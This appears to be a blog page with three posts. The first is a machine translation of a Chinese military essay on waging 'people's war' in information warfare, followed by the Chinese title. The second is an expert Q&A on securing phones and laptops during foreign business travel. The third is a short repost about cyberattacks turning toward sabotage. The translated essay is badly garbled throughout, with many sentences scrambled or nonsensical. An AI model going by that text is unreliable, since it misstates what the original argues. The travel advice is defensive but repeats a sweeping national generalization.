 In the information war, the warring parties tend to use one or the most advanced aircraft, ships, tanks, artillery, missiles, and other cutting-edge technology, greatly improve the technical content of war, battle space from the past in order to develop a terrestrial land-based , sea, air, space, electricity multidimensional space to support security operations equipment and technical means of highly specialized equipment. In addition, information warfare unit time combat strength increases rapidly, fighting more intense, direct combatants psychological and physical quality put forward higher requirements. No rigorous professional training not only ordinary people cannot use advanced weapons and equipment and well-trained and have high-tech weapons of the enemy to make a direct confrontation, and even logistical and equipment support is difficult to carry out the task. Coupled with the war mostly in sparsely populated border and coastal areas as well as sea and air, greatly increased the masses direct war frontline of difficulty. Therefore, information warfare, the masses will direct the war, supporting the front of the main changes is indirect war, supporting the front main support for the war is also supported by the human and material resources into technology-based intelligence support based.    

(Four) of information warfare undergone revolutionary change, people’s war is facing severe challenges the traditional tactics     of people’s war in the long-term practice, the army formed a set of flexible strategies and tactics of people’s war, created numerous “survival of the fittest,” the war miracle. However, we should see that in the past we have conducted a people’s war, is the relatively low level of weaponry semi-mechanized warfare, the main battle, the battle is on the ground, thus forming the main form of combat – trench warfare, warfare and a series of guerrilla warfare and related, are conducive to our full advantage of the number of people. Especially in irregular warfare guerrilla warfare that, in the proportion of combat operations and the impact of the outcome of the war is relatively large.     Engels pointed out: “Once technological advances can be used for military purposes and has been used for military purposes, they will almost immediately forcibly, and often is a violation of the will of the commander of the changes caused by warfare or even revolution.”

With IT The rapid development of high-tech weapons and the widespread use of information warfare revolutionary change taking place. For example: Battlefield to the five-dimensional space development; missiles, electronic warfare, network warfare, and many other new combat styles have been in war; C4 ISR against the increasingly fierce battle to win control of information and operational command of the army to become the premise and focus; to become independent of combat raids, much warfare, night fighting, the proportion of firepower increases; emphasize more arms, a variety of weapons to combat the overall implementation of the integration of diverse, asymmetric, non-contact, non-linear operations become an important mode of combat, etc. and so on. In this case, the traditional to the Army mainly to ground-based battlefield warfare, warfare, guerrilla warfare combat forms and information warfare will be difficult to adapt to the requirements. For example, in past wars, melee midnight oil has been the army’s forte. But in the information war, faced with advanced surveillance technology and long-range precision strike weapons of the enemy, we will be faced with melee midnight oil does not rely on rope, unseen challenges, and even enemies in the night-side occupy a greater advantage.

 How to deal with the challenges of information warfare, the development of people’s war strategy and tactics, to carry out the people’s war to become an urgent problem. 

Second, information warfare still insist on carrying out the people’s war     (a) information warfare does not change the inherent social and political attributes of war, still have to carry out the basic conditions of the people’s war     and class produced since private ownership since the war is never left over politics. Compared with previous wars, although the scale of information warfare, duration, and other aspects of weapons and equipment have undergone significant changes, showing a lot of new features, but the war itself has properties and not because of social and political development of warfare change.

 Information warfare is still a continuation of politics, there is still justice and injustice of distinction, the nature of war and the people’s support or oppose the war are still often contributing factors, the basic conditions for the conduct of civil war, that the justice of the war and mass still exists.     The justice of the war is the political basis for the conduct of civil war, but also an important factor in the outcome of war. China’s socialist nature and a defensive national defense policy decisions for our future information warfare is necessarily oppose hegemonism and safeguarding national security and unity, the protection of national survival and development interests, building a moderately prosperous society to ensure the smooth conduct of the just war . The justice of this war is that we carry out in the information warfare solid political foundation for the people’s war is our war to win the final victory of the future fundamental guarantee.    

War mass is the source of strength to win the victory. Our future of information warfare, represents the fundamental interests of the overwhelming majority of people just war, and thus be able to get the full support of the masses. Information warfare is a comprehensive national strength, is the political, economic, military, technological, diplomatic, cultural, social and psychological fronts, including the overall war. Although the majority of the people cannot direct a large scale as before the war, supporting the front, but they are in the war embodied the role of the masses through the comprehensive national strength of support and backing for the war action reflected. In this sense, the people and the comprehensive national strength, and is inextricably linked to the outcome of war in the vast masses of people, there remains a great power war deepest roots, as long as this kind of hidden among the great masses of the people forces play out, we can still win the information war.    

 (Two) information war did not change the outcome of the basic laws of war, the determinants of the outcome of war is still the person     information warfare, the growing importance of weaponry, an advantage in weaponry easier to win the war party initiative and even war. However, no matter how the change in the form of war, the basic law of the outcome of war is constant, that is, people are the main body of the war, the determining factor is winning the war, weapons and equipment is an important factor in the decision outcome of the war.     In information warfare dominance and decisive role, not because of the extensive application of high-tech weaponry and all reduced. Engels long ago: “gun that he is not moving, you need to by a brave heart and a strong hand to use them.” Then advanced weaponry, once removed from the people, will lose its proper performance. U.S. Department of Defense submitted to the U.S. Congress in the Gulf War report: “Winning the war victory is people, not machines or technology.” Justice of the people’s war and mass decisions, our combatants are equipped with more high political consciousness and consciously contribute to achieve the purpose of the war, they better than the enemy weapons in the hands full performance.    

 Practice shows that war, weaponry weaknesses, you can play to people’s subjective initiative to change. Person’s conscious activity, not only in understanding the dynamic laws of war, revealing the possibility of victory, the most important is to actively create conditions for the use of various means of victory possibility into reality. Information warfare unprecedented fierce, brutal, war scale and process more vulnerable to a variety of factors, which also enhances the role of people in the war. Weaponry at a disadvantage in the case, as long as the person’s subjective initiative into full play, relying on the excellent political and military qualities, based on the existing equipment, creating and choosing the right strategy and tactics to achieve the best combination of people and weapons, we will be able to superior weaponry against the enemy find ways to make up for the lack of weapons, and promote superior enemy on the battlefield transformed my bad posture, and ultimately win the war.    

(Three) for the development of information technology to carry out the people’s war has injected new vitality into     this world, things are always dialectical, we must address the information war against the people’s war presented challenges, while also saw rapid information technology development but also to carry people’s war has injected new vitality.     First, the rapid development of information technology, in order to build a strong people’s war potential to provide a new historical opportunity. Since the reform and opening up, Deng Xiaoping’s “Science and technology are primary productive forces” and Jiang Zemin’s “education” under the correct guidance of strategic thinking, China’s information technology as the representative of the rapid development of high-tech, cutting-edge technology in a number of breakthrough has been made, in biotechnology, computer technology, rocket technology, satellite communications technology, superconducting materials and other fields of research, has been close to or reach the world advanced level. 

At present, the annual output value of China’s information industry to more than 2 times higher than the GDP growth rate for the overall national socio-economic structure of the increasing influence for the conduct of the people’s war has laid a relatively solid material and technological foundation.     Secondly, the rapid development of information technology, the war for the people supporting the front provides a new technical support. The level of development of science and technology determine the masses of the people to participate in and support the war, way, way. Although the material basis of information warfare and warfare has undergone a fundamental change, but the people on the course and outcome of the war has not reduced, but with the advancement of science and technology as well as improving the quality of people’s technology and growing. Compatible with the characteristics of modern high-tech military and civilian increasingly prominent in the current level of information of our military forces with a larger gap between the Western powers in the case, widely hidden in the masses of scientific and technological resources, will be the future of information warfare army survival of the fittest and the strong support necessary complement. As long as these potential technological forces in a planned, organized mobilization, we can effectively compensate for the overall military weaponry disadvantage, the formation of local areas, local battlefield technological advantages, to achieve survival of the fittest.    

 Finally, the development of information technology for innovative tactics to expand the people’s war, the new space. As Mao Zedong pointed out: “the world of things, always a thing down, there is one thing offensive, it also has a thing down. …… We believe that relying on the people, the world would not unassailable ‘magic’ . “On the one hand, the information it has its advanced weaponry side, but there are also weaknesses and limitations. Especially advanced information technology structure is very large and complex weapons systems, it is difficult for all-round protection. In recent years, several global epidemic of vicious computer viruses caused huge losses for countries that modern information systems vulnerability proof. On the other hand, the development of information technology, people’s war for us to provide new technical means, expanding the innovative tactics of people’s war room. 

In the past people’s war, we have to rely on relatively backward technology and weaponry, yet it can create a lot of strategy and tactics to defeat the enemy. Today, we already have in information technology for a foundation, but also for the specific characteristics of information warfare, transformation and creating new tactics, research and exploration play win the information war “trick.” 

Third, information warfare to carry out the people’s war Countermeasures     (a) accelerate the development of comprehensive national strength, and lay a solid foundation of people’s war     of information warfare in the final analysis is a comprehensive national strength. Refers to a country’s comprehensive national strength have all the resources and material and spiritual strength, marking the country’s economic, political, technological, military, cultural and other aspects of the overall level of development. To carry out the people’s war winning the information war, you must have a strong comprehensive national strength. On China’s national conditions, in order to accelerate the development of comprehensive national strength, lay the foundation of people’s war, we must focus on grasping the following aspects:    

First, to develop the economy. Economic strength of a country’s comprehensive national strength is an important indicator. Strong economic strength, winning the information war can lay a solid material foundation.Meanwhile, the economic strength is the material basis for the modernization of national defense, there are no certain economic forces for support, defense modernization will lose the foundation. Therefore, we must persist in taking economic construction as the center, concentrating on the development of social productive forces, the country’s overall economic construction to consciously obey.    

 Second, in order to accelerate the development of high-tech information technology as the representative. On the one hand, science and technology to enhance the comprehensive national strength has a decisive, transformative role. In the current form of society by the industrialized to the process of information, who can seize the technology “commanding heights” and “frontier”, whoever may enhance the comprehensive national strength to win. On the other hand, science and technology are primary productive forces, but also the first combat, defense construction is inseparable from the support of advanced science and technology. Especially information technology compared to other technologies, the military and civilian compatibility stronger, the new information technologies emerging, in accelerating national and social information, but also for the military information construction provides a rare historical opportunity.    

Third, comprehensively promote the construction of military information, and constantly enhance military strength. After the war directly to the performance of military forces of the contest, to winning the information war is inseparable from a strong line with the requirements of the military information warfare. To seize the world’s new military revolution brought to the army building historic opportunity to accelerate weaponry leapfrog development, modernization of the means to achieve the people’s war; unswervingly implement the strategic project, training a large number of qualified military personnel; at all levels to strengthen joint and combined arms training to improve joint operational capabilities; according elite, synthesis, efficient principle, establish and perfect an appropriate scale, reasonable structure, organization lean, agile command of military system; study the characteristics of information warfare, innovation and the development of information warfare theory.    

Fourth, for the information war characteristics, strengthen national defense reserve forces. For information militia building should be the characteristics of high-tech warfare, and universality in keeping the masses on the basis of outstanding quality construction. Primary militia and militia on the distinction between ordinary and should not be confined to the age criteria, but to combine their technological quality measure. To further reduce the size of infantry units, focus on strengthening the missiles, artillery, communications, chemical defense, information and other high-tech special unit of the building. Reserve forces to comprehensively enhance the quality of construction, vigorously improve the rapid mobilization and the ability to carry out combat missions, narrowing the gap with the active forces fighting efforts to achieve the establishment of an appropriate scale, reasonable structure, compiled scientific, reliable and workable objectives reserve forces.    

Fifth, to carry out various forms of national defense education, improve national defense. The strength of the concept of national defense exhibit a country preparing for war ideological foundation is solid, countries in the world to enhance the national defense concept placed in improving comprehensive national strength in an important position. To adhere to the masses of people’s war, we must carry out effective, diverse forms of national defense education, so that the masses has always been to establish a strong national defense, information warfare is carried out in the people’s war to lay a solid ideological foundation.    

(Two) features in-depth study of information warfare, development and innovation strategy and tactics of people’s war     strategy and tactics of people’s war, is to carry out the soul of the people’s war. As the saying goes: “The Sword inferior to sword better than people.” In past wars, people’s war has been able to repeatedly create a “survival of the fittest” miracle, one of the important reasons is that we have a set of adjustable strategy and tactics. In the future for a long period of time, we will be at a disadvantage on the weaponry, and the traditional people’s war strategy and tactics as the development of warfare changes facing severe challenges, so winning the information war under conditions of people , must examine the characteristics of information warfare, development and innovation strategy and tactics of people’s war. Create new tactics in the development process, should focus grasp the following principles:    

Ffirst, to establish and adapt to information warfare operational concepts. Since there has been no information warfare military practice, so in the process of creating new tactics, the concept of mechanized warfare vulnerable bondage. Therefore, the idea is to create new tactics update the premise that only break the shackles of old ideas, establish and adapt to information warfare operational concepts in order to provide a fresh perspective, with the correct way of thinking to create new tactics. For example: In the assessment of combat forces, we should abandon the labor-intensive, the number and scale of their concepts, technology-intensive, quality and efficiency concepts; choice of target in combat, to abandon the idea of annihilating the enemy’s effective strength-based, establish a centralized main forces to fight the enemy vital concept.    

Second, pay attention to the traditional military tactics absorb nutrients. Information warfare is a new form of war, our military has created in the last war tactics, may not apply to today’s wars, and some tactics need to abandon, and some need to be improved. We study and research the traditional tactics of war, not in the future information warfare copy of these tactics, but to learn the older generation of revolutionaries, military strategist creating new tactics stand, viewpoint and method. This is our future development and creating new tactics and source of wisdom. For example, in China’s Revolutionary War created a “concentrate superior forces to fight a war of annihilation” of war, in the information war, as a means of long-range precision strike extensive use of the practice of concentration of forces no longer feasible. However, we should understand the tactics of Mao Zedong created the spiritual essence, that the enemy superior in the case of my poor, through a certain method, the local formation of the war situation in who wins. This idea is still in the information war has important guiding significance. We can use this as a guide, according to the specific characteristics of information warfare, the development of the traditional tactics to “concentrate superior firepower to fight the enemy vital” new tactics.    

Third, the combination of the actual record of our military tactics. Creating new tactics, not behind closed doors, not on paper, must be combined with the actual situation of our army. Currently, the army is actually the largest in weaponry compared with the developed countries there is still a big gap, though they have some advanced weaponry, but still in a lot of low-tech equipment. Which determine our tactics neither copying Western countries of war, in order to avoid committing “Porgy and dragon than treasure” low-level errors, nor imagined, impractical so-called “new tactics.” Measure one kind of tactics is correct or not, not to see how its name sounds good, how novel methods, means, how advanced the key depends on whether it is really effective in combat. Enhance the value of research tactics, is that correct tactics to make up the gap weaponry to achieve superior weaponry with inferior equipment to defeat the purpose of the enemy. We should adhere to the “you hit, I hit my”, the focus on tactical innovation to existing equipment on high-tech enemy and seize enemy weapons and equipment information some of the weaknesses, give full play to existing weapons equipment performance, and strive to me for so long, and strike the enemy’s weaknesses, research, and create a “soil”, “foreign” combination of low high school weaponry combined tactics.     (Three) to establish a sound mechanism for rapid mobilization of national defense, to ensure the people’s war potential for rapid accumulation and transformation of information warfare to carry out the people’s war, faced with the short duration of the war and the people gathered the forces of war and transformation contradiction between the relatively long time. To resolve this conflict, we must establish a sound mechanism for rapid mobilization of national defense. The range includes the formation of rapid military expansion and expand quickly, persons and goods transport and complement fast, fast track to a wartime economy, the restructuring of the industrial structure and expand military production and fast; rapid mobilization mechanism of this standard is to be able to adapt to the information sudden outbreak of the war, the war is characterized by short duration, so that the potential of the people’s war in a very short time and quickly gathered quickly converted into national defense capabilities. Establishment of mechanisms for rapid mobilization of national defense, for the power of the people’s war play, winning the information war has very important significance. 

Rapid mobilization mechanism must have the following elements:     First, clear objectives and tasks. Should be included in national defense mobilization of economic and social development plans, incorporating national defense and army building master plan, clearly defined stages at different times under different circumstances and people’s armed mobilization, economic mobilization, civil air defense mobilization and mobilization readiness transportation and other aspects of the target with the task.    

Second, laws and regulations are complete. On the mobilization of rights and obligations, rewards and penalties, responsibilities and benefits should be based on the laws and regulations in the form of regulations, the mobilization of all aspects of the various aspects and rule-based, law.     Third, the mobilization plan carefully. Troops, economy, transportation, civil air defense, telecommunications, health and other aspects of the mobilization of both careful planning in order to prepare for mobilization in peacetime, wartime mobilization provide the basis for implementation.Army and local levels, according to the national mobilization plan to develop this level of mobilization plans and safeguards.    

Fourth, science and technology to mobilize prominent position. In information warfare launched the people’s war, the way people’s war frontline war intelligence and intelligence is mainly supporting the front, which determines the future of science and technology for national defense mobilization will be the prominent content.    

Fifth, the formal procedures quickly and efficiently. According to the characteristics of information warfare, military departure from China’s national conditions, to establish a war in the war potential into the strength of the effective ways and methods. For example, the expansion of the armed forces, civilian products, converting, transportation capacity for the acquisition, implementation of civil air defense, compensation for economic losses as well as other financial and material resources mobilization, should form a set of rapid and effective mobilization of forms and procedures, so that the people’s war bringing power and conversion speed can meet the requirement of information warfare.    

(Four) combining various approaches to play the overall power of the people’s war     of revolutionary war in the past, an important part of people’s war, is dominated by the armed struggle, the combination of a variety of forms of struggle to play the overall power of the people’s war . In information warfare, military struggle and political, economic, diplomatic, cultural, ideological struggles fields more closely intertwined, in some cases even non-dominant armed struggle. Therefore, adherence to the combination of a variety of forms of struggle, for winning the information war has a more important significance.    

 In information warfare, military by political factors more prominent political and military action, strong policy, and even a small tactical actions may be related to the overall strategic situation in the international community have a broad impact. Therefore, the information warfare conduct civil wars, on the one hand to make war all soldiers and civilians establish the overall concept of policy ideas, with significant international influence in the issue, in relation to the overall operations, ensure that the needs of the military and political obedience. On the other hand struggle in the UN and other international arena widespread publicity, win public support, and strive to get politically active.    

Information warfare increasingly focused on economic efficiency, greater dependence on the economy. In the rapidly growing trend of economic globalization, the case of economic blockade, economic sanctions would weaken the enemy’s comprehensive national strength is an important initiative, and to combat the economic center of the enemy, the better to play a drastic effect. During the Gulf War, the Kosovo War and the war in Iraq, the United States launched the war before the war and implementation process, are complemented by economic sanctions.

It is foreseeable that in the information war, economic sanctions and counter-sanctions, blockade and counter-blockade as a primary means of economic sectors will be fierce struggle to become another battlefield of information warfare. We conduct information warfare people’s war, on the one hand to use economic means of struggle, economic base and destroy the enemy’s ability to regenerate, maximize the economic loss to the enemy, eroding its war potential; hand to mobilize kind of strength, positive and effective implementation of economic protection, maintaining the normal operation of the national economy, efforts to develop production, economic development, for the victory of the war to lay a solid material foundation.     Any one country to war are very focused use of diplomatic means to secure more state support to maximize isolate each other, give each other causing huge political and moral pressure. Even superpowers also paid great attention to diplomacy with military struggle. In information warfare launched the people’s war, of course, but also actively through diplomatic struggle to establish a broad international united front. 

Reform and opening up, China has actively conducted exchanges and cooperation in the international political, economic, cultural and other fields has played an active and important role in the international community to establish a peace-loving, maintain stability, to just and responsible handling of international affairs the image of a big country, it’s all for us in the information warfare fruitful diplomatic struggle to create the conditions. In the information war, we want to make good use of all kinds of contradictions, give full play to all efforts conducive to my various international factors. To take full advantage of the favorable as a permanent member of the UN’s international status, to consolidate and expand the role of the United Nations, especially the UN Security Council in dealing with the leading role of international security to thwart any so-called international intervention against our country; give full play and the developing countries consistent with the fundamental interests of political advantage, and properly handle the relationship with the countries concerned, differentiation enemy’s allies; pay attention and have a special country with the same or equivalent national strategic interests of the military establishment of some form of collaboration or partnership, the strategic formation of a certain degree of cooperation and coordinate mechanisms. 

As long as we are able to unite all forces that can be united, to win the support of as many countries as to maximize isolate and attack the enemy, you can establish a broad international united front for the victory to carry out the people’s war to create a favorable international environment.     Information warfare, media warfare, warfare has become increasingly important. In the field of public opinion and propaganda, should make full use of newspapers, television, radio, Internet, multimedia and other traditional and non-traditional media, the Western developed countries of the world and strive to break the monopoly of public opinion, crushing hostile nations attempt to demonize the image of our country, torn hegemony doctrine of “human rights”, “humanitarian aid”, “democracy” and so gorgeous packaging, with true, correct public opinion supported the war inspired the masses of enthusiasm and self-consciousness, for the support of the international community on China.

 In the legal battle field, we should make good use of existing international law, to carry out the people’s war for me to provide a legal basis to prevent the enemy to international law as an excuse for me to intervene and wage war, but also to actively participate in international law and various international mechanisms the development and establishment, to prevent the establishment of prejudicial interests of our country, is conducive to hostile forces and international mechanisms of international law, but also to strengthen domestic legislation in the field work, so that hostile forces without loopholes. At the same time, pay attention to the psychological protection, encouraging all people to fight, winning the information war and build a strong psychological defense. 


信息化战争中开展人民战争面临的挑战和对策思考

国防大学战略教研室

中國人民解放軍

總參謀部

     人民战争是我军克敌制胜的传统法宝。上个世纪90年代以来,随着世界新军事变革的蓬勃兴起和高技术兵器在战争中的广泛应用,战争形态开始由机械化战争向信息化战争转变,信息化战争将是21纪的主要战争形态经成为共识。在半机械化、机械化战争中形成和发展起来的人民战争思想,如何正视信息化战争所带来的挑战、如何继续在信息化战争中发挥其特有的优势,确保打赢未来可能发生的战争,是我们面临的一个重大的理论问题和紧迫的实践问题。

   

Ask the Experts: Travel Abroad with Electronics

This time around, a reader wrote in with a very common question:

Q: “A member of my management team is about to go on a business trip to a country with known cyber-spying capabilities. She wants to take her phone, tablet and laptop so she can be productive on the road. What can I do to make this safer for her and our organization without restricting her work capability on the road in an unreasonable manner?”

Adam Hostetler opened with: 

The standard here is don’t bring anything electronic, if you can help it. In most cases, that’s not probable so don’t bring your normal personal phones or laptops, no smartphone at all is advisable. Bring loaner devices that have only exactly what they need and can be burned when they get back. Only connect through a VPN, and have that account monitored on the other end. Don’t leave phone or laptop in a hotel room, even in the safe, and don’t talk business there either.

Jim Klun added:

There is likely no way to do this without restricting – or at least significantly changing – the way she works. 

It has to be assumed that any information on her personal devices will be compromised. 
It also can be assumed that any information flowing between her devices and the outside world will be compromised. 

I would recommend two things:

1. Take only what you can afford to lose. Communicate only what you can afford to lose. 

        So – take a small number of devices (e.g. phone, laptop) minimally configured with only that information absolutely required for this trip. 
        Better to have corporate staff respond to email requests from her rather than to allow access to critical corporate resources from suspect location. 
        If internal connectivity to corporate resources must be allowed ( e.g VPN) it should be ideally require 2-factor auth of some sort, use strong encryption, and grant access only to a limited subset of resources. 
        All credentials can be assumed to be lost – hence the utility of two-factor.  All of the employees credentials should be changed on return. 

        All devices brought back should be assumed to be compromised and will need complete re-imaging. 
                

2.  Consider creating “go-kits” and well-defined repeatable processes for employees who travel to such locations. 

     A special set of devices ( laptop, phone, etc) that are minimally configured and can be wiped on return.  No personally owned devices should be allowed. 
     Connectivity for those devices – if absolutely needed – that allows access only to a tightly restricted and monitored subset of internal corporate resources. 
     Most importantly – training for employees who make these trips.  The employee must understand the special risks being incurred and be aware of their responsibility to protect the company and the companies existing customers.   
      As above – all of the employees credentials should be changed on return.

Bill Hagestad summed it up with this: 

This one is near and dear to my heart…I call these rules of counter cyber espionage the  李侃如的中國旅遊規則 (Lieberthal’s China Travel Rules)

Cellphone and laptop @ home brings “loaner” devices, erased before he leaves home country & wiped clean immediately upon returns;

In China, disable Bluetooth & Wi-Fi, phone never out of his sight;

In meetings, not only turn off his phone but also remove battery, microphone could be turned on remotely;

Connect to the Internet only via encrypted, password-protected channel, copies & pastes his password from a USB thumb drive;

Never type in a password directly, “the Chinese are very good at installing key-logging software on your laptop.”

The article can be found @ http://www.nytimes.com/2012/02/11/technology/electronic-security-a-worry-in-an-age-of-digital-espionage.html?pagewanted=all

Brent Huston closed with:

Any electronic items they do take on the road with them should be current on patches, AV signatures and detection capabilities. All data, drives, systems, etc. should be strongly encrypted when possible to do so (Pay special attention to export restrictions on crypto depending on where they are going.) Also, turn and burn EVERYTHING when they come back. Treat all media and data obtained during the travel as suspicious or malicious in nature. Trojans of data and documents are common (and usually they scan as clean with common tools). This is especially true for high value targets and critical infrastructure clients. Trust us! Safe travels! 

李侃如的中國旅遊規則

(Lieberthal’s China Travel Rules)


ØCellphone and laptop home brings “loaner” devices, erased before he leaves home country & wiped clean immediately upon returns;
ØIn China, disable Bluetooth Wi-Fi, phone never out of his sight;
ØIn meetings, not only turn off his phone but also remove batterymicrophone could be turned on remotely;
ØConnect to the Internet only via encrypted, password-protected channel, copies & pastes his password from a USB thumb drive;
ØNever types in a password directly, “the Chinese are very good at installing key-logging software on your laptop.”

Cyberattacks on Rise Against U.S. Corporations

See on Scoop.itChinese Cyber Code Conflict

Officials said the aim in a new wave of attacks was not espionage but sabotage, and that the source seemed to be in the Middle East.

Red-DragonRising‘s insight:

ICS-CERT issued this alert that cyber attacks are now trending towards sabaotage instead of cyber espionage…combine cyber jihaist activity, e.g.; Shamoon, with cyber criminality and you have a very potent and violatile mix   directly impacting and affecting both commercial enterprises and the United States critical infrastructure…

 

Standby to standby…

 

Semper Fi,

 

謝謝您

紅龍

See on www.nytimes.com